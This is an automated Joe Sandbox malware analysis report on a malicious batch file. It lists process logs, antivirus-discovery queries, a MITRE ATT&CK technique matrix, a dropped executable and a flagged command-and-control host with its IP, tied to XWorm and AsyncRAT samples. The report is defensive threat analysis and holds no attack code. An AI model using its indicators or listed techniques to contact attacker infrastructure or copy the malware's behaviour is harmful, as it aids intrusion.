Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\Windows\System32\Tasks\$nya-gykiBRcP VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\Windows\System32\Tasks\$nya-gykiBRcP VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.SqlXml\v4.0_4.0.0.0__b77a5c561934e089\System.Data.SqlXml.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation

Source: C:\Windows\System32\dllhost.exe

Code function: 7_2_0000000140002300 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,

7_2_0000000140002300

Source: C:\Windows\System32\winlogon.exe

Code function: 8_2_000001E858988090 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

8_2_000001E858988090

Source: dllhost.exe

Binary or memory string: MsMpEng.exe

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	11 Windows Management Instrumentation	1 Scripting	1 DLL Side-Loading	1 Obfuscated Files or Information	11 Input Capture	1 System Time Discovery	Remote Services	1 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	12 Native API	1 DLL Side-Loading	1 Access Token Manipulation	1 Install Root Certificate	LSASS Memory	2 File and Directory Discovery	Remote Desktop Protocol	11 Input Capture	1 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	12 Command and Scripting Interpreter	11 Scheduled Task/Job	713 Process Injection	1 Timestomp	Security Account Manager	122 System Information Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	11 Scheduled Task/Job	Login Hook	11 Scheduled Task/Job	1 DLL Side-Loading	NTDS	241 Security Software Discovery	Distributed Component Object Model	Input Capture	1 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	2 PowerShell	Network Logon Script	Network Logon Script	1 File Deletion	LSA Secrets	2 Process Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	21 Masquerading	Cached Domain Credentials	121 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Modify Registry	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	121 Virtualization/Sandbox Evasion	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Access Token Manipulation	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	713 Process Injection	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	1 Hidden Files and Directories	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
NhoqAfkhHL.bat	0%	ReversingLabs

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Windows\$nya-onimai2\qVrKPA.exe	100%	Joe Sandbox ML
C:\Windows\$nya-onimai2\qVrKPA.exe	5%	ReversingLabs

Source	Detection	Scanner	Label
http://crl.(	0%	Avira URL Cloud	safe
http://ocsp.msocsp.	0%	Avira URL Cloud	safe
http://crl.mi	0%	Avira URL Cloud	safe
http://3csp.icrosof4m/ocp0	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
bg.microsoft.map.fastly.net	199.232.214.172	true	false	high
capacity-sg.gl.at.ply.gg	147.185.221.24	true	true	unknown
fp2e7a.wpc.phicdn.net	192.229.221.95	true	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://schemas.xmlsoap.org/ws/2005/07/securitypolicy	lsass.exe, 00000009.00000000.2134285461.00000140AD850000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.3527020051.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.3528269548.00000140AD850000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2134259713.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp	false		high
http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702	lsass.exe, 00000009.00000002.3527020051.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2134259713.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 0000001C.00000002.3566116533.00000240B3632000.00000004.00000001.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/09/policy	lsass.exe, 00000009.00000002.3527020051.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2134259713.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/wsdl/erties	lsass.exe, 00000009.00000002.3527020051.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2134259713.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/wsdl/soap12/	lsass.exe, 00000009.00000000.2134259713.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 0000001C.00000002.3566116533.00000240B3632000.00000004.00000001.00020000.00000000.sdmp	false		high
http://3csp.icrosof4m/ocp0	lsass.exe, 00000009.00000002.3545283451.00000140AE074000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2135334573.00000140AE074000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.(	svchost.exe, 00000014.00000000.2213030346.000001428A879000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000014.00000002.3601346126.000001428A879000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/wsdl/	lsass.exe, 00000009.00000000.2134259713.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.microsoft.co	powershell.exe, 0000001C.00000002.3557370304.00000240B2DD6000.00000004.00000001.00020000.00000000.sdmp	false		high
http://ocsp.msocsp.	lsass.exe, 00000009.00000000.2135138922.00000140AE000000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://aka.ms/pscore6xG	powershell.exe, 0000001C.00000002.3566116533.00000240B3361000.00000004.00000001.00020000.00000000.sdmp	false		high
http://crl.ver)	svchost.exe, 00000014.00000000.2213088609.000001428A88A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000014.00000002.3601746570.000001428A88A000.00000004.00000001.00020000.00000000.sdmp	false		high
https://aka.ms/pscore6	powershell.exe, 0000001C.00000002.3566116533.00000240B3361000.00000004.00000001.00020000.00000000.sdmp, Null.6.dr	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust	lsass.exe, 00000009.00000002.3527020051.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2134259713.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp	false		high
https://aka.ms/pscore68	powershell.exe, 0000001C.00000002.3566116533.00000240B3361000.00000004.00000001.00020000.00000000.sdmp	false		high
http://docs.oasis-open.org/ws-sx/ws-trust/200512	lsass.exe, 00000009.00000000.2134285461.00000140AD850000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.3528269548.00000140AD850000.00000004.00000001.00020000.00000000.sdmp	false		high
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd	lsass.exe, 00000009.00000002.3527020051.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.2134259713.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp	false		high
http://schemas.micro	svchost.exe, 0000001D.00000002.3545016604.000001A204EE0000.00000002.00000001.00040000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 0000001C.00000002.3566116533.00000240B3361000.00000004.00000001.00020000.00000000.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 0000001C.00000002.3566116533.00000240B3632000.00000004.00000001.00020000.00000000.sdmp	false		high
http://crl.mi	svchost.exe, 00000014.00000000.2213030346.000001428A879000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000014.00000002.3601346126.000001428A879000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
147.185.221.24	capacity-sg.gl.at.ply.gg	United States		12087	SALSGIVERUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1571318
Start date and time:	2024-12-09 09:16:12 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 46s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	20
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	31
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	NhoqAfkhHL.bat renamed because original name is a hash value
Original Sample Name:	c62dff3f1b1b032ddb7e089b6e56cfcd27082d62a9627dec4ec8f2423175b750.bat
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winBAT@32/25@1/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 50 Number of non-executed functions: 345
Cookbook Comments:	Found application associated with file extension: .bat

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 199.232.214.172, 192.229.221.95
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, ocsp.edge.digicert.com, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtSetInformationFile calls found.
VT rate limit hit for: NhoqAfkhHL.bat

Simulations

Behavior and APIs

Time	Type	Description
03:16:59	API Interceptor	2x Sleep call for process: WMIC.exe modified
03:17:02	API Interceptor	6014x Sleep call for process: powershell.exe modified
03:17:21	API Interceptor	37017x Sleep call for process: svchost.exe modified
03:17:43	API Interceptor	1297146x Sleep call for process: winlogon.exe modified
03:17:44	API Interceptor	74560x Sleep call for process: lsass.exe modified
03:17:51	API Interceptor	1142216x Sleep call for process: dwm.exe modified
03:18:05	API Interceptor	1577x Sleep call for process: spoolsv.exe modified
03:18:07	API Interceptor	1573x Sleep call for process: cmd.exe modified
03:18:07	API Interceptor	1371x Sleep call for process: conhost.exe modified
03:18:09	API Interceptor	114x Sleep call for process: dllhost.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
147.185.221.24	a4lIk1Jrla.exe	Get hash	malicious	Njrat, RevengeRAT	Browse
	W6s1vzcRdj.exe	Get hash	malicious	XWorm	Browse
	u7e3vb5dfk.exe	Get hash	malicious	XWorm	Browse
	aOi4JyF92S.exe	Get hash	malicious	XWorm	Browse
	PG4w1WB9dE.exe	Get hash	malicious	AsyncRAT, XWorm	Browse
	a4BE6gJooT.exe	Get hash	malicious	XWorm	Browse
	grK0Oh8p4Z.exe	Get hash	malicious	AsyncRAT, XWorm	Browse
	SplpM1fFkV.exe	Get hash	malicious	Unknown	Browse
	msedge.exe	Get hash	malicious	AsyncRAT, XWorm	Browse
	6ox7RfKeE3.exe	Get hash	malicious	AsyncRAT, XWorm	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
fp2e7a.wpc.phicdn.net	SciRTXsDzk.exe	Get hash	malicious	Unknown	Browse	192.229.221.95
	IobqEI79aH.exe	Get hash	malicious	Unknown	Browse	192.229.221.95
	Invoice_Payment_Confirmation_INV#240085.PDF.exe	Get hash	malicious	Unknown	Browse	192.229.221.95
	SN500, SN150 Spec.exe	Get hash	malicious	FormBook	Browse	192.229.221.95
	file.exe	Get hash	malicious	Stealc	Browse	192.229.221.95
	file.exe	Get hash	malicious	Stealc	Browse	192.229.221.95
	file.exe	Get hash	malicious	Stealc	Browse	192.229.221.95
	Folder.exe	Get hash	malicious	Unknown	Browse	192.229.221.95
	file.exe	Get hash	malicious	AveMaria, StormKitty, VenomRAT	Browse	192.229.221.95
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	192.229.221.95
bg.microsoft.map.fastly.net	TRANSFERENCIA COMPROBANTES.lnk	Get hash	malicious	XenoRAT	Browse	199.232.210.172
	file.exe	Get hash	malicious	LummaC Stealer	Browse	199.232.210.172
	file.exe	Get hash	malicious	Quasar	Browse	199.232.210.172
	file.exe	Get hash	malicious	Quasar	Browse	199.232.210.172
	file.exe	Get hash	malicious	AveMaria, StormKitty, VenomRAT	Browse	199.232.210.172
	Q6OOwHYZzH.exe	Get hash	malicious	DCRat	Browse	199.232.210.172
	List of required items pdf.vbs	Get hash	malicious	GuLoader	Browse	199.232.214.172
	List of required items.vbs	Get hash	malicious	Unknown	Browse	199.232.214.172
	List of required items and services pdf.vbs	Get hash	malicious	GuLoader	Browse	199.232.214.172
	TTSIpRHKZz.exe	Get hash	malicious	Babadeda, Binder HackTool	Browse	199.232.214.172

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
SALSGIVERUS	sora.mpsl.elf	Get hash	malicious	Mirai	Browse	147.160.103.28
	a4lIk1Jrla.exe	Get hash	malicious	Njrat, RevengeRAT	Browse	147.185.221.24
	W6s1vzcRdj.exe	Get hash	malicious	XWorm	Browse	147.185.221.24
	u7e3vb5dfk.exe	Get hash	malicious	XWorm	Browse	147.185.221.24
	aOi4JyF92S.exe	Get hash	malicious	XWorm	Browse	147.185.221.24
	ozgpPwVAu1.exe	Get hash	malicious	XWorm	Browse	147.185.221.22
	PG4w1WB9dE.exe	Get hash	malicious	AsyncRAT, XWorm	Browse	147.185.221.24
	a4BE6gJooT.exe	Get hash	malicious	XWorm	Browse	147.185.221.24
	grK0Oh8p4Z.exe	Get hash	malicious	AsyncRAT, XWorm	Browse	147.185.221.24
	jSm8N1jXbk.exe	Get hash	malicious	S400 RAT	Browse	147.185.221.23

Process:	C:\Windows\System32\svchost.exe
File Type:	Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
Category:	dropped
Size (bytes):	71954
Entropy (8bit):	7.996617769952133
Encrypted:	true
SSDEEP:	1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
MD5:	49AEBF8CBD62D92AC215B2923FB1B9F5
SHA1:	1723BE06719828DDA65AD804298D0431F6AFF976
SHA-256:	B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
SHA-512:	BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
Malicious:	false
Preview:	MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..\|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........\|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.\|.c.&>?..^t. ..;..X.d.E.0G....[Q.,......#.Dp..L.o\|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	471
Entropy (8bit):	7.168966251991555
Encrypted:	false
SSDEEP:	12:JuGTFtG5qPGyWFe9GcPVaFH7ydkLALytSr:JRnGINWRcPVahzLALy6
MD5:	2ACF368122D37891F4EFC709886B793E
SHA1:	9907A38938BCD709D8317568CCFCFDA1D8C7FFC7
SHA-256:	5D8BBDD66379C2B0B27D206E70FEF5684043F3006A6049B6B8BD2358622EE1BC
SHA-512:	936071E89F337C93249F59654145195E6AF1BD6F97FC0554524B966D5B35141583B07811DD857F8E8331AA0AEC3028698E28B9229D7D9DAFC05DFE9B5F87DA02
Malicious:	false
Preview:	0..........0.....+.....0......0...0......N"T ....n..........9..20241208190220Z0s0q0I0...+........9.q...._..(.#..Y\C...N"T ....n..........9....n.U_$t...]......20241208190220Z....20241215190220Z0....H................:.Y....#@....k.......1.....Kb4.6Etn.>..P.I..!j.....j.^.Zx,rt.W..zS..oH.(.....v..}.......(p@.aF.0....\|1N...0...,...;..ie].](.........*.<..If....@EU...-2.RZ.....Mk...z.&..e2]...L.K%......A6.3...<v,.u.q.S..w...'.L5..Q.LX....'9".7..4%.t...07..i@.....

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	471
Entropy (8bit):	7.19668826114456
Encrypted:	false
SSDEEP:	6:J0MwGGuM8X5o7D82TwrUGu0y9huMO9mCkEngfSqHZRVKv+r3+J/47B4gmnHQggsx:JuG15qPGu0Z9LEfSq5414rmH4tlsVn
MD5:	E187E7B116D9A73D8DF0591832E43367
SHA1:	A4E3A64A00BD8C76073C5AC8E6E3B83479D76380
SHA-256:	27A80B260A2C661B9A5C767441504E5D38DCA79B332328A6171AAEEFB8969406
SHA-512:	1CCE96BC85FF69244E966A7E5C0F51FE6CD6E10EDDD767385977BBD75ECE957AA1C7C747407D34920E409F0B297ECAA1894F02EE3EEAF20B41DA2266DB7CD481
Malicious:	false
Preview:	0..........0.....+.....0......0...0......N"T ....n..........9..20241207190147Z0s0q0I0...+........9.q...._..(.#..Y\C...N"T ....n..........9....e&D.^=.8t.]......20241207190147Z....20241214190147Z0....H..............H..e..m..9`Hu.n8I.L ..]t.......m....iMd..+.s...?...........G.s".)\|...."..r....C...3.B..6.F.>.XS\|l..E.X..{H.]..>p.<z.a......y T.!..yM.2Q@....W.5....yb.G..^.n...A.=......t..5[...>8.oc........).}6..FbU. =......gq.Z.q....H-o..W.F...@".{...}...x.B..N

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	471
Entropy (8bit):	7.224046916386193
Encrypted:	false
SSDEEP:	12:JuGTFu5qPGJpCFe4DpfrcM3vDjWe4HJIRH5u1NlzotRl:JRwIACLDpDRDye4pIqr6tRl
MD5:	C776BC45C99B7007A11F27524A5637E3
SHA1:	D41C9F87705BAB776522CE534AE9BB70DFE8A567
